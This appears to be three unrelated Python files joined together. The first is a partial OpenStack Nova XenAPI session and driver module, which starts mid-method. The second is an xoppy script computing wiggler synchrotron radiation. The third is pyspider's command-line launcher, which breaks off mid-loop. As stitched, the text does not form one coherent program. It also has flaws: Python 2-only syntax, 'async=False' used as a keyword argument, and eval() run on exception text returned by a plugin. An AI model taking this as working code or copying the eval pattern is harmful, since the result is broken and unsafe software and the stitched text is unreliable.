return self._host.get_host_uptime(host)
def host_maintenance_mode(self, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation."""
return self._host.host_maintenance_mode(host, mode)
def add_to_aggregate(self, context, aggregate, host, **kwargs):
"""Add a compute host to an aggregate."""
return self._pool.add_to_aggregate(context, aggregate, host, **kwargs)
def remove_from_aggregate(self, context, aggregate, host, **kwargs):
"""Remove a compute host from an aggregate."""
return self._pool.remove_from_aggregate(context,
aggregate, host, **kwargs)
def undo_aggregate_operation(self, context, op, aggregate,
host, set_error=True):
"""Undo aggregate operation when pool error raised."""
return self._pool.undo_aggregate_operation(context, op,
aggregate, host, set_error)
def legacy_nwinfo(self):
"""
Indicate if the driver requires the legacy network_info format.
"""
# TODO(tr3buchet): remove this function once all virts return false
return False
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
self._vmops.power_on(instance)
def get_per_instance_usage(self):
"""Get information about instance resource usage.
:returns: dict of nova uuid => dict of usage
info
"""
return self._vmops.get_per_instance_usage()
class XenAPISession(object):
"""The session to invoke XenAPI SDK calls."""
def __init__(self, url, user, pw, virtapi):
import XenAPI
self.XenAPI = XenAPI
self._sessions = queue.Queue()
self.is_slave = False
exception = self.XenAPI.Failure(_("Unable to log in to XenAPI "
"(is the Dom0 disk full?)"))
url = self._create_first_session(url, user, pw, exception)
self._populate_session_pool(url, user, pw, exception)
self.host_uuid = self._get_host_uuid()
self.product_version, self.product_brand = \
self._get_product_version_and_brand()
self._virtapi = virtapi
def _create_first_session(self, url, user, pw, exception):
try:
session = self._create_session(url)
with timeout.Timeout(CONF.xenapi_login_timeout, exception):
session.login_with_password(user, pw)
except self.XenAPI.Failure, e:
# if user and pw of the master are different, we're doomed!
if e.details[0] == 'HOST_IS_SLAVE':
master = e.details[1]
url = pool.swap_xapi_host(url, master)
session = self.XenAPI.Session(url)
session.login_with_password(user, pw)
self.is_slave = True
else:
raise
self._sessions.put(session)
return url
def _populate_session_pool(self, url, user, pw, exception):
for i in xrange(CONF.xenapi_connection_concurrent - 1):
session = self._create_session(url)
with timeout.Timeout(CONF.xenapi_login_timeout, exception):
session.login_with_password(user, pw)
self._sessions.put(session)
def _get_host_uuid(self):
if self.is_slave:
aggr = self._virtapi.aggregate_get_by_host(
context.get_admin_context(),
CONF.host, key=pool_states.POOL_FLAG)[0]
if not aggr:
LOG.error(_('Host is member of a pool, but DB '
'says otherwise'))
raise exception.AggregateHostNotFound()
return aggr.metadetails[CONF.host]
else:
with self._get_session() as session:
host_ref = session.xenapi.session.get_this_host(session.handle)
return session.xenapi.host.get_uuid(host_ref)
def _get_product_version_and_brand(self):
"""Return a tuple of (major, minor, rev) for the host version and
a string of the product brand"""
software_version = self._get_software_version()
product_version_str = software_version.get('product_version')
product_brand = software_version.get('product_brand')
if None in (product_version_str, product_brand):
return (None, None)
product_version = tuple(int(part) for part in
product_version_str.split('.'))
return product_version, product_brand
def _get_software_version(self):
host = self.get_xenapi_host()
return self.call_xenapi('host.get_software_version', host)
def get_session_id(self):
"""Return a string session_id. Used for vnc consoles."""
with self._get_session() as session:
return str(session._session)
@contextlib.contextmanager
def _get_session(self):
"""Return exclusive session for scope of with statement."""
session = self._sessions.get()
try:
yield session
finally:
self._sessions.put(session)
def get_xenapi_host(self):
"""Return the xenapi host on which nova-compute runs on."""
with self._get_session() as session:
return session.xenapi.host.get_by_uuid(self.host_uuid)
def call_xenapi(self, method, *args):
"""Call the specified XenAPI method on a background thread."""
with self._get_session() as session:
return session.xenapi_request(method, args)
def call_plugin(self, plugin, fn, args):
"""Call host.call_plugin on a background thread."""
# NOTE(johannes): Fetch host before we acquire a session. Since
# get_xenapi_host() acquires a session too, it can result in a
# deadlock if multiple greenthreads race with each other. See
# bug 924918
host = self.get_xenapi_host()
# NOTE(armando): pass the host uuid along with the args so that
# the plugin gets executed on the right host when using XS pools
args['host_uuid'] = self.host_uuid
with self._get_session() as session:
return self._unwrap_plugin_exceptions(
session.xenapi.host.call_plugin,
host, plugin, fn, args)
def call_plugin_serialized(self, plugin, fn, *args, **kwargs):
params = {'params': pickle.dumps(dict(args=args, kwargs=kwargs))}
rv = self.call_plugin(plugin, fn, params)
return pickle.loads(rv)
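    # Example call (hypothetical plugin and argument names, for illustration
    # only); args/kwargs are pickled into 'params' and unpickled by the plugin:
    #   session.call_plugin_serialized('glance', 'download_vhd',
    #                                  image_id=image_id, sr_path=sr_path)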
def _create_session(self, url):
"""Stubout point. This can be replaced with a mock session."""
return self.XenAPI.Session(url)
def _unwrap_plugin_exceptions(self, func, *args, **kwargs):
"""Parse exception details."""
try:
return func(*args, **kwargs)
except self.XenAPI.Failure, exc:
LOG.debug(_("Got exception: %s"), exc)
if (len(exc.details) == 4 and
exc.details[0] == 'XENAPI_PLUGIN_EXCEPTION' and
exc.details[2] == 'Failure'):
params = None
try:
# FIXME(comstud): eval is evil.
params = eval(exc.details[3])
except Exception:
raise exc
raise self.XenAPI.Failure(params)
else:
raise
except xmlrpclib.ProtocolError, exc:
LOG.debug(_("Got exception: %s"), exc)
raise
def get_rec(self, record_type, ref):
try:
return self.call_xenapi('%s.get_record' % record_type, ref)
except self.XenAPI.Failure, e:
if e.details[0] != 'HANDLE_INVALID':
raise
return None
def get_all_refs_and_recs(self, record_type):
"""Retrieve all refs and recs for a Xen record type.
Handles race-conditions where the record may be deleted between
the `get_all` call and the `get_record` call.
"""
for ref in self.call_xenapi('%s.get_all' % record_type):
rec = self.get_rec(record_type, ref)
# Check to make sure the record still exists. It may have
# been deleted between the get_all call and get_record call
if rec:
yield ref, rec
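    # Example (illustrative record type), tolerant of records deleted
    # mid-iteration:
    #   for vm_ref, vm_rec in session.get_all_refs_and_recs('VM'):
    #       LOG.debug(_("found VM %s"), vm_rec['uuid'])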
|
|
"""
File with trajectory written to file: /users/srio/Oasys/tmp.traj
wiggler_cdf: Electron beam energy (from velocities) = 3.000355 GeV
wiggler_cdf: gamma (from velocities) = 5870.853556 GeV
wiggler_cdf: Curvature (min) = 0.000000 m^-1
wiggler_cdf: (max) 0.199920 m^-1
wiggler_cdf: Radius of curvature (max) = 81689012171814624.000000 m
wiggler_cdf: (min) = 5.002009 m
wiggler_cdf: Critical Energy (max.) = 11973.937061 eV
wiggler_cdf: (min.) = 0.000000 eV
wiggler_cdf: Total no.of photons = 1.690471e+17 (in DE=99900.000 eV)
wiggler_cdf: File with wiggler cdf written to file: b'/users/srio/Oasys/xshwig.sha'
Electron beam energy (from velocities) = 3.000355 GeV
gamma (from velocities) = 5870.851896
curvature (max) = 0.199920 m
(min) = 0.000000 m
Radius of curvature (max) = 81689012171830928.000000 m
(min) = 5.002009 m
Critical Energy (max.) = 11973.926903 eV
(min.) = 0.000000 eV
File with wiggler spectrum written to file: spectrum.dat
Total power (from integral of spectrum): 10106.973910 W
Total number of photons (from integral of spectrum): 1.62115e+19
"""
#
# script to run the wiggler preprocessor (created by ShadowOui:Wiggler)
#
from srxraylib.sources import srfunc
from srxraylib.plot.gol import plot, plot_image, plot_scatter, plot_show
import numpy
from srxraylib.util.h5_simple_writer import H5SimpleWriter
from srxraylib.plot.gol import set_qt
from scipy.interpolate import interp1d
set_qt()
def P(u):
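    # Universal synchrotron spectral shape: u times the integral of K_{5/3}
    # from u to infinity (srfunc.fintk53), up to a normalization constant.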
return 2 * numpy.pi / numpy.sqrt(3) * u * srfunc.fintk53(u)
def xoppy_calc_wiggler_radiation(
ELECTRONENERGY = 3.0,
ELECTRONENERGYSPREAD = 0.0,
ELECTRONCURRENT = 0.1,
ELECTRONBEAMSIZEH = 10e-6,
ELECTRONBEAMSIZEV = 10e-6,
ELECTRONBEAMDIVERGENCEH = 10e-6,
ELECTRONBEAMDIVERGENCEV = 10e-6,
PERIODID = 0.120,
NPERIODS = 37,
KV = 22.416,
KH = 0.0,
KPHASE = 0.0,
DISTANCE = 30.0,
GAPH = None,
GAPV = None,
HSLITPOINTS = 500,
VSLITPOINTS = 500,
METHOD = 0,
PHOTONENERGYMIN = 100.0,
PHOTONENERGYMAX = 100100.0,
PHOTONENERGYPOINTS = 101,
USEEMITTANCES = 0,
h5_file = "wiggler_radiation.h5",
h5_entry_name = "XOPPY_RADIATION",
h5_initialize = True,
h5_parameters = None,
):
(traj, pars) = srfunc.wiggler_trajectory(
b_from = 0,
inData = "",
nPer = NPERIODS, #37,
nTrajPoints = HSLITPOINTS,
ener_gev = ELECTRONENERGY,
per = PERIODID,
kValue = KV,
trajFile = "tmp.traj",
shift_x_flag = 0,
shift_x_value = 0.0,
shift_betax_flag = 0,
shift_betax_value = 0.0)
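    # Assumed row layout of traj (inferred from the indexing below):
    # rows 0-2 = x, y, z; rows 3-5 = beta_x, beta_y, beta_z;
    # row 6 = curvature; row 7 = vertical magnetic field.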
energy, flux, power = srfunc.wiggler_spectrum(traj,
enerMin = PHOTONENERGYMIN,
enerMax = PHOTONENERGYMAX,
nPoints = PHOTONENERGYPOINTS,
electronCurrent = ELECTRONCURRENT,
outFile = "",
elliptical = False)
# #
# # calculate cdf and write file for Shadow/Source
# #
#
# tmp = srfunc.wiggler_cdf(traj,
# enerMin = 100.0,
# enerMax = 100000.0,
# enerPoints = 1001,
# outFile = b'tmp.sha',
# elliptical = False)
#
# print(">>>>>",tmp)
gamma = ELECTRONENERGY / 512e-6
    X = traj[0, :].copy()
    Y = traj[1, :].copy()
    Z = traj[2, :].copy()  # vertical coordinate; traj[1, :] here was a copy-paste slip
    divX = traj[3, :].copy()
    divZ = traj[5, :].copy()
    curX = traj[6, :].copy()
    By = traj[7, :].copy()
# posX = divX * (distance + Y)
    Ec = 665.0 * ELECTRONENERGY ** 2 * numpy.abs(By)  # critical energy [eV] = 665 * E[GeV]^2 * B[T]
    Ecmax = 665.0 * ELECTRONENERGY ** 2 * numpy.abs(By).max()  # use |By|.max(), not |By.max()|
    sigmaBp = 0.597 / gamma * numpy.sqrt(Ecmax / PHOTONENERGYMIN)
divXX = numpy.linspace(divX.min() - 3 * sigmaBp, divX.max() + 3 * sigmaBp, HSLITPOINTS)
divZZ = numpy.linspace(-3 * sigmaBp, 3 * sigmaBp, VSLITPOINTS)
e = numpy.linspace(PHOTONENERGYMIN, PHOTONENERGYMAX, PHOTONENERGYPOINTS)
p = numpy.zeros( (PHOTONENERGYPOINTS, HSLITPOINTS, VSLITPOINTS) )
if PHOTONENERGYPOINTS > 3:
do_plot = False
else:
do_plot = True
for i in range(e.size):
Ephoton = e[i]
# horizontal divergence after Tanaka
if False:
e_over_ec = Ephoton / Ecmax
uudlim = 1.0 / gamma
print(">>>>>gamma",gamma)
uud = numpy.linspace(-uudlim*0.99, uudlim*0.99, divX.size)
uu = e_over_ec / numpy.sqrt(1 - gamma**2 * uud**2)
plot(uud, P(uu))
# vertical divergence
        fluxDivZZ = srfunc.sync_ang(1, divZZ * 1e3, polarization=0,
                    e_gev=ELECTRONENERGY, i_a=ELECTRONCURRENT, hdiv_mrad=1.0, energy=Ephoton, ec_ev=Ecmax)
if do_plot:
plot(divZZ, fluxDivZZ, title="min intensity %f" % fluxDivZZ.min(), xtitle="divZ", ytitle="fluxDivZZ", show=1)
# horizontal divergence
intensity = P(Ephoton / Ec)
fintensity = interp1d(divX, intensity, kind='linear', axis=-1, copy=True, bounds_error=False, fill_value=0.0,
assume_sorted=False)
intensity_interpolated = fintensity(divXX)
if True:
intensity_interpolated.shape = -1
            fluxDivZZCC = srfunc.sync_ang(1, divXX * 1e3, polarization=0,
                                          e_gev=ELECTRONENERGY, i_a=ELECTRONCURRENT, hdiv_mrad=1.0, energy=Ephoton, ec_ev=Ecmax)
fluxDivZZCC.shape = -1
print(">>>>>>>", intensity_interpolated.shape, fluxDivZZCC.shape)
intensity_convolved = numpy.convolve(intensity_interpolated/intensity_interpolated.max(),
fluxDivZZCC/fluxDivZZCC.max(),
mode='same')
else:
intensity_convolved = intensity_interpolated
if do_plot:
plot(divX, intensity/intensity.max(),
divXX, intensity_interpolated/intensity_interpolated.max(),
divXX, intensity_convolved/intensity_convolved.max(),
title=">>>>> min intensity %f, Ephoton=%6.2f" % (intensity.min(), Ephoton), xtitle="divX", ytitle="intensity",
legend=["orig","interpolated","convolved"],show=1)
# combine H * V
INTENSITY = numpy.outer(intensity_convolved/intensity_convolved.max(), fluxDivZZ/fluxDivZZ.max())
print(">>>>", flux.shape, INTENSITY.shape, p.shape)
p[i,:,:] = INTENSITY / INTENSITY.sum() * flux[i]
if do_plot:
plot_image(INTENSITY, divXX, divZZ, aspect='auto', title="E=%6.2f" % Ephoton, show=1)
#
h = divXX * DISTANCE
v = divZZ * DISTANCE
if h5_file != "":
try:
if h5_initialize:
h5w = H5SimpleWriter.initialize_file(h5_file,creator="xoppy_wigglers.py")
else:
h5w = H5SimpleWriter(h5_file,None)
h5w.create_entry(h5_entry_name,nx_default=None)
h5w.add_stack(e,h,v,p,stack_name="Radiation",entry_name=h5_entry_name,
title_0="Photon energy [eV]",
title_1="X gap [mm]",
title_2="Y gap [mm]")
h5w.create_entry("parameters",root_entry=h5_entry_name,nx_default=None)
#TODO: open!
# for key in h5_parameters.keys():
# h5w.add_key(key,h5_parameters[key], entry_name=h5_entry_name+"/parameters")
print("File written to disk: %s"%h5_file)
        except Exception as e:
            print("ERROR initializing h5 file: %s" % e)
return e, h, v, p
if __name__ == "__main__":
e, h, v, p = xoppy_calc_wiggler_radiation()
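    # Each energy slice of p sums to the integrated flux at that energy
    # (see the normalization above), so summing over the slit axes recovers
    # the spectrum; a quick sanity plot using this script's own names:
    spectrum = p.sum(axis=(1, 2))
    plot(e, spectrum, xtitle="Photon energy [eV]", ytitle="Flux", show=1)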
|
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-03-05 00:11:49
import os
import six
import time
import shutil
import logging
import logging.config
from six.moves import builtins
import click
import pyspider
from pyspider.database import connect_database
from pyspider.libs import utils
def read_config(ctx, param, value):
if not value:
return {}
import json
config = json.load(value)
ctx.default_map = config
return config
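# Example JSON accepted by --config (keys are subcommand names mapping to
# their option defaults; structure inferred from ctx.default_map above):
#   {"webui": {"port": 5001}, "fetcher": {"poolsize": 200}}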
def connect_db(ctx, param, value):
if not value:
return
return utils.Get(lambda: connect_database(value))
def load_cls(ctx, param, value):
if isinstance(value, six.string_types):
return utils.load_object(value)
return value
def connect_rpc(ctx, param, value):
if not value:
return
try:
from six.moves import xmlrpc_client
except ImportError:
import xmlrpclib as xmlrpc_client
return xmlrpc_client.ServerProxy(value, allow_none=True)
@click.group(invoke_without_command=True)
@click.option('-c', '--config', callback=read_config, type=click.File('r'),
help='a json file with default values for subcommands. {"webui": {"port":5001}}')
@click.option('--debug', envvar='DEBUG', is_flag=True, help='debug mode')
@click.option('--queue-maxsize', envvar='QUEUE_MAXSIZE', default=100,
help='maxsize of queue')
@click.option('--taskdb', envvar='TASKDB', callback=connect_db,
help='database url for taskdb, default: sqlite')
@click.option('--projectdb', envvar='PROJECTDB', callback=connect_db,
help='database url for projectdb, default: sqlite')
@click.option('--resultdb', envvar='RESULTDB', callback=connect_db,
help='database url for resultdb, default: sqlite')
@click.option('--amqp-url', help='amqp url for rabbitmq, default: built-in Queue')
@click.option('--phantomjs-proxy', help="phantomjs proxy ip:port")
@click.option('--data-path', default='./data', help='data dir path')
@click.pass_context
def cli(ctx, **kwargs):
"""
A powerful spider system in python.
"""
logging.config.fileConfig(os.path.join(os.path.dirname(__file__), "logging.conf"))
# get db from env
for db in ('taskdb', 'projectdb', 'resultdb'):
if kwargs[db] is not None:
continue
if os.environ.get('MYSQL_NAME'):
kwargs[db] = utils.Get(lambda db=db: connect_database('mysql+%s://%s:%s/%s' % (
db, os.environ['MYSQL_PORT_3306_TCP_ADDR'],
os.environ['MYSQL_PORT_3306_TCP_PORT'], db)))
elif os.environ.get('MONGODB_NAME'):
kwargs[db] = utils.Get(lambda db=db: connect_database('mongodb+%s://%s:%s/%s' % (
db, os.environ['MONGODB_PORT_27017_TCP_ADDR'],
os.environ['MONGODB_PORT_27017_TCP_PORT'], db)))
elif ctx.invoked_subcommand == 'bench':
if kwargs['data_path'] == './data':
kwargs['data_path'] += '/bench'
shutil.rmtree(kwargs['data_path'], ignore_errors=True)
os.mkdir(kwargs['data_path'])
if db in ('taskdb', 'resultdb'):
kwargs[db] = utils.Get(lambda db=db: connect_database('sqlite+%s://' % (db)))
else:
kwargs[db] = utils.Get(lambda db=db: connect_database('sqlite+%s:///%s/%s.db' % (
db, kwargs['data_path'], db[:-2])))
else:
if not os.path.exists(kwargs['data_path']):
os.mkdir(kwargs['data_path'])
kwargs[db] = utils.Get(lambda db=db: connect_database('sqlite+%s:///%s/%s.db' % (
db, kwargs['data_path'], db[:-2])))
# queue
if kwargs.get('amqp_url'):
from pyspider.libs.rabbitmq import Queue
for name in ('newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result'):
kwargs[name] = utils.Get(lambda name=name: Queue(name, amqp_url=kwargs['amqp_url'],
maxsize=kwargs['queue_maxsize']))
elif os.environ.get('RABBITMQ_NAME'):
from pyspider.libs.rabbitmq import Queue
amqp_url = ("amqp://guest:guest@%(RABBITMQ_PORT_5672_TCP_ADDR)s"
":%(RABBITMQ_PORT_5672_TCP_PORT)s/%%2F" % os.environ)
for name in ('newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result'):
kwargs[name] = utils.Get(lambda name=name: Queue(name, amqp_url=amqp_url,
maxsize=kwargs['queue_maxsize']))
else:
from multiprocessing import Queue
for name in ('newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result'):
kwargs[name] = Queue(kwargs['queue_maxsize'])
# phantomjs-proxy
if kwargs.get('phantomjs_proxy'):
pass
elif os.environ.get('PHANTOMJS_NAME'):
kwargs['phantomjs_proxy'] = os.environ['PHANTOMJS_PORT'][len('tcp://'):]
ctx.obj = utils.ObjectDict(ctx.obj or {})
ctx.obj['instances'] = []
ctx.obj.update(kwargs)
if ctx.invoked_subcommand is None and not ctx.obj.get('testing_mode'):
ctx.invoke(all)
return ctx
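# Typical invocations (assuming the usual `pyspider` console entry point):
#   pyspider                           # run all components with defaults
#   pyspider --queue-maxsize 200 all   # same, with larger queues
#   pyspider webui --port 5001         # run only the webui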
@cli.command()
@click.option('--xmlrpc/--no-xmlrpc', default=True)
@click.option('--xmlrpc-host', default='0.0.0.0')
@click.option('--xmlrpc-port', envvar='SCHEDULER_XMLRPC_PORT', default=23333)
@click.option('--inqueue-limit', default=0,
              help='size limit of the task queue for each project; '
              'tasks are ignored when the queue overflows')
@click.option('--delete-time', default=24 * 60 * 60,
              help='seconds to wait before removing a project marked as deleted')
@click.option('--active-tasks', default=100, help='number of recent active tasks kept for the log')
@click.option('--loop-limit', default=1000, help='maximum number of tasks handled in one scheduler loop')
@click.option('--scheduler-cls', default='pyspider.scheduler.Scheduler', callback=load_cls,
help='scheduler class to be used.')
@click.pass_context
def scheduler(ctx, xmlrpc, xmlrpc_host, xmlrpc_port,
inqueue_limit, delete_time, active_tasks, loop_limit, scheduler_cls):
g = ctx.obj
Scheduler = load_cls(None, None, scheduler_cls)
scheduler = Scheduler(taskdb=g.taskdb, projectdb=g.projectdb, resultdb=g.resultdb,
newtask_queue=g.newtask_queue, status_queue=g.status_queue,
out_queue=g.scheduler2fetcher, data_path=g.get('data_path', 'data'))
scheduler.INQUEUE_LIMIT = inqueue_limit
scheduler.DELETE_TIME = delete_time
scheduler.ACTIVE_TASKS = active_tasks
scheduler.LOOP_LIMIT = loop_limit
g.instances.append(scheduler)
if g.get('testing_mode'):
return scheduler
if xmlrpc:
utils.run_in_thread(scheduler.xmlrpc_run, port=xmlrpc_port, bind=xmlrpc_host)
scheduler.run()
@cli.command()
@click.option('--xmlrpc/--no-xmlrpc', default=False)
@click.option('--xmlrpc-host', default='0.0.0.0')
@click.option('--xmlrpc-port', envvar='FETCHER_XMLRPC_PORT', default=24444)
@click.option('--poolsize', default=100, help="max simultaneous fetches")
@click.option('--proxy', help="proxy host:port")
@click.option('--user-agent', help='user agent')
@click.option('--timeout', help='default fetch timeout')
@click.option('--fetcher-cls', default='pyspider.fetcher.Fetcher', callback=load_cls,
help='Fetcher class to be used.')
@click.pass_context
def fetcher(ctx, xmlrpc, xmlrpc_host, xmlrpc_port, poolsize, proxy, user_agent,
timeout, fetcher_cls):
g = ctx.obj
Fetcher = load_cls(None, None, fetcher_cls)
fetcher = Fetcher(inqueue=g.scheduler2fetcher, outqueue=g.fetcher2processor,
poolsize=poolsize, proxy=proxy)
fetcher.phantomjs_proxy = g.phantomjs_proxy
if user_agent:
fetcher.user_agent = user_agent
if timeout:
fetcher.default_options = dict(fetcher.default_options)
fetcher.default_options['timeout'] = timeout
g.instances.append(fetcher)
if g.get('testing_mode'):
return fetcher
if xmlrpc:
utils.run_in_thread(fetcher.xmlrpc_run, port=xmlrpc_port, bind=xmlrpc_host)
fetcher.run()
@cli.command()
@click.option('--processor-cls', default='pyspider.processor.Processor', callback=load_cls,
help='Processor class to be used.')
@click.pass_context
def processor(ctx, processor_cls):
g = ctx.obj
Processor = load_cls(None, None, processor_cls)
processor = Processor(projectdb=g.projectdb,
inqueue=g.fetcher2processor, status_queue=g.status_queue,
newtask_queue=g.newtask_queue, result_queue=g.processor2result)
g.instances.append(processor)
if g.get('testing_mode'):
return processor
processor.run()
@cli.command()
@click.option('--result-cls', default='pyspider.result.ResultWorker', callback=load_cls,
help='ResultWorker class to be used.')
@click.pass_context
def result_worker(ctx, result_cls):
g = ctx.obj
ResultWorker = load_cls(None, None, result_cls)
result_worker = ResultWorker(resultdb=g.resultdb, inqueue=g.processor2result)
g.instances.append(result_worker)
if g.get('testing_mode'):
return result_worker
result_worker.run()
@cli.command()
@click.option('--host', default='0.0.0.0', envvar='WEBUI_HOST',
help='webui bind to host')
@click.option('--port', default=5000, envvar='WEBUI_PORT',
              help='webui bind to port')
@click.option('--cdn', default='//cdnjscn.b0.upaiyun.com/libs/',
help='js/css cdn server')
@click.option('--scheduler-rpc', callback=connect_rpc, help='xmlrpc path of scheduler')
@click.option('--fetcher-rpc', callback=connect_rpc, help='xmlrpc path of fetcher')
@click.option('--max-rate', type=float, help='max rate for each project')
@click.option('--max-burst', type=float, help='max burst for each project')
@click.option('--username', envvar='WEBUI_USERNAME',
              help='username for locked projects')
@click.option('--password', envvar='WEBUI_PASSWORD',
              help='password for locked projects')
@click.option('--need-auth', default=False, help='need username and password')
@click.option('--fetcher-cls', default='pyspider.fetcher.Fetcher', callback=load_cls,
help='Fetcher class to be used.')
@click.option('--webui-instance', default='pyspider.webui.app.app', callback=load_cls,
help='webui Flask Application instance to be used.')
@click.pass_context
def webui(ctx, host, port, cdn, scheduler_rpc, fetcher_rpc, max_rate, max_burst,
username, password, need_auth, fetcher_cls, webui_instance):
app = load_cls(None, None, webui_instance)
Fetcher = load_cls(None, None, fetcher_cls)
g = ctx.obj
app.config['taskdb'] = g.taskdb
app.config['projectdb'] = g.projectdb
app.config['resultdb'] = g.resultdb
app.config['cdn'] = cdn
if max_rate:
app.config['max_rate'] = max_rate
if max_burst:
app.config['max_burst'] = max_burst
if username:
app.config['webui_username'] = username
if password:
app.config['webui_password'] = password
# fetcher rpc
if isinstance(fetcher_rpc, six.string_types):
fetcher_rpc = connect_rpc(ctx, None, fetcher_rpc)
if fetcher_rpc is None:
fetcher = Fetcher(inqueue=None, outqueue=None, async=False)
fetcher.phantomjs_proxy = g.phantomjs_proxy
app.config['fetch'] = lambda x: fetcher.fetch(x)[1]
else:
import umsgpack
app.config['fetch'] = lambda x: umsgpack.unpackb(fetcher_rpc.fetch(x).data)
if isinstance(scheduler_rpc, six.string_types):
scheduler_rpc = connect_rpc(ctx, None, scheduler_rpc)
if scheduler_rpc is None and os.environ.get('SCHEDULER_NAME'):
app.config['scheduler_rpc'] = connect_rpc(ctx, None, 'http://%s/' % (
os.environ['SCHEDULER_PORT_23333_TCP'][len('tcp://'):]))
elif scheduler_rpc is None:
app.config['scheduler_rpc'] = connect_rpc(ctx, None, 'http://localhost:23333/')
else:
app.config['scheduler_rpc'] = scheduler_rpc
app.debug = g.debug
g.instances.append(app)
if g.get('testing_mode'):
return app
app.run(host=host, port=port)
@cli.command()
@click.option('--phantomjs-path', default='phantomjs', help='phantomjs path')
@click.option('--port', default=25555, help='phantomjs port')
@click.pass_context
def phantomjs(ctx, phantomjs_path, port):
import subprocess
g = ctx.obj
phantomjs_fetcher = os.path.join(
os.path.dirname(pyspider.__file__), 'fetcher/phantomjs_fetcher.js')
try:
_phantomjs = subprocess.Popen([phantomjs_path,
phantomjs_fetcher,
str(port)])
except OSError:
return None
def quit(*args, **kwargs):
_phantomjs.kill()
_phantomjs.wait()
        logging.info('phantomjs exited.')
phantomjs = utils.ObjectDict(port=port, quit=quit)
g.instances.append(phantomjs)
if g.get('testing_mode'):
return phantomjs
_phantomjs.wait()
@cli.command()
@click.option('--fetcher-num', default=1, help='instance num of fetcher')
@click.option('--processor-num', default=1, help='instance num of processor')
@click.option('--result-worker-num', default=1,
help='instance num of result worker')
@click.option('--run-in', default='subprocess', type=click.Choice(['subprocess', 'thread']),
              help='run each component in a thread or a subprocess. '
              'threads are always used on Windows.')
@click.pass_context
def all(ctx, fetcher_num, processor_num, result_worker_num, run_in):
ctx.obj['debug'] = False
g = ctx.obj
if run_in == 'subprocess' and os.name != 'nt':
run_in = utils.run_in_subprocess
else:
run_in = utils.run_in_thread
threads = []
# phantomjs
g['testing_mode'] = True
phantomjs_config = g.config.get('phantomjs', {})
phantomjs_obj = ctx.invoke(phantomjs, **phantomjs_config)
if phantomjs_obj and not g.get('phantomjs_proxy'):
g['phantomjs_proxy'] = 'localhost:%s' % phantomjs_obj.port
g['testing_mode'] = False
# result worker
result_worker_config = g.config.get('result_worker', {})
for i in range(result_worker_num):
threads.append(run_in(ctx.invoke, result_worker, **result_worker_config))
# processor
processor_config = g.config.get('processor', {})
for i in range(processor_num):
threads.append(run_in(ctx.invoke, processor, **processor_config))
# fetcher
fetcher_config = g.config.get('fetcher', {})
fetcher_config.setdefault('xmlrpc_host', '127.0.0.1')
for i in range(fetcher_num):
threads.append(run_in(ctx.invoke, fetcher, **fetcher_config))
# scheduler
scheduler_config = g.config.get('scheduler', {})
scheduler_config.setdefault('xmlrpc_host', '127.0.0.1')
threads.append(run_in(ctx.invoke, scheduler, **scheduler_config))
# running webui in main thread to make it exitable
webui_config = g.config.get('webui', {})
webui_config.setdefault('scheduler_rpc', 'http://localhost:%s/'
% g.config.get('scheduler', {}).get('xmlrpc_port', 23333))
ctx.invoke(webui, **webui_config)
# exit components run in threading
for each in g.instances:
each.quit()
# exit components run in subprocess
for each in threads:
if not each.is_alive():
continue
if hasattr(each, 'terminate'):
each.terminate()
each.join()
@cli.command()
@click.option('--fetcher-num', default=1, help='instance num of fetcher')
@click.option('--processor-num', default=2, help='instance num of processor')
@click.option('--result-worker-num', default=1, help='instance num of result worker')
@click.option('--run-in', default='subprocess', type=click.Choice(['subprocess', 'thread']),
              help='run each component in a thread or a subprocess. '
              'threads are always used on Windows.')
@click.option('--total', default=10000, help="total url in test page")
@click.option('--show', default=20, help="show how many urls in a page")
@click.pass_context
def bench(ctx, fetcher_num, processor_num, result_worker_num, run_in, total, show):
from pyspider.libs import bench
from pyspider.webui import bench_test
    bench_test  # make pyflakes happy
ctx.obj['debug'] = False
g = ctx.obj
if result_worker_num == 0:
g['processor2result'] = None
if run_in == 'subprocess' and os.name != 'nt':
run_in = utils.run_in_subprocess
else:
run_in = utils.run_in_thread
g.projectdb.insert('bench', {
'name': 'bench',
'status': 'RUNNING',
'script': bench.bench_script % {'total': total, 'show': show},
'rate': total,
'burst': total,
'updatetime': time.time()
})
# disable log
logging.getLogger().setLevel(logging.ERROR)
logging.getLogger('scheduler').setLevel(logging.ERROR)
logging.getLogger('fetcher').setLevel(logging.ERROR)
logging.getLogger('processor').setLevel(logging.ERROR)
logging.getLogger('result').setLevel(logging.ERROR)
logging.getLogger('webui').setLevel(logging.ERROR)
threads = []
# result worker
result_worker_config = g.config.get('result_worker', {})
for i in range(result_worker_num):
threads.append(run_in(ctx.invoke, result_worker,
result_cls='pyspider.libs.bench.BenchResultWorker',
**result_worker_config))
# processor
processor_config = g.config.get('processor', {})
for i in range(processor_num):
threads.append(run_in(ctx.invoke, processor,
processor_cls='pyspider.libs.bench.BenchProcessor',
**processor_config))
# fetcher
fetcher_config = g.config.get('fetcher', {})
fetcher_config.setdefault('xmlrpc_host', '127.0.0.1')
for i in range(fetcher_num):
threads.append(run_in(ctx.invoke, fetcher,
fetcher_cls='pyspider.libs.bench.BenchFetcher',
**fetcher_config))
# scheduler
scheduler_config = g.config.get('scheduler', {})
scheduler_config.setdefault('xmlrpc_host', '127.0.0.1')
threads.append(run_in(ctx.invoke, scheduler,
scheduler_cls='pyspider.libs.bench.BenchScheduler',
**scheduler_config))
# webui
webui_config = g.config.get('webui', {})
webui_config.setdefault('scheduler_rpc', 'http://localhost:%s/'
% g.config.get('scheduler', {}).get('xmlrpc_port', 23333))
threads.append(run_in(ctx.invoke, webui, **webui_config))
# run project
time.sleep(1)
import requests
rv = requests.post('http://localhost:5000/run', data={
'project': 'bench',
})
assert rv.status_code == 200, 'run project error'
# wait bench test finished
while True:
time.sleep(1)
if builtins.all(getattr(g, x) is None or getattr(g, x).empty() for x in (
'newtask_queue', 'status_queue', 'scheduler2fetcher',
'fetcher2processor', 'processor2result')):
break
# exit components run in threading
for each in g.instances:
each.quit()
# exit components run in subprocess
for each in threads:
if hasattr(each, 'terminate'):
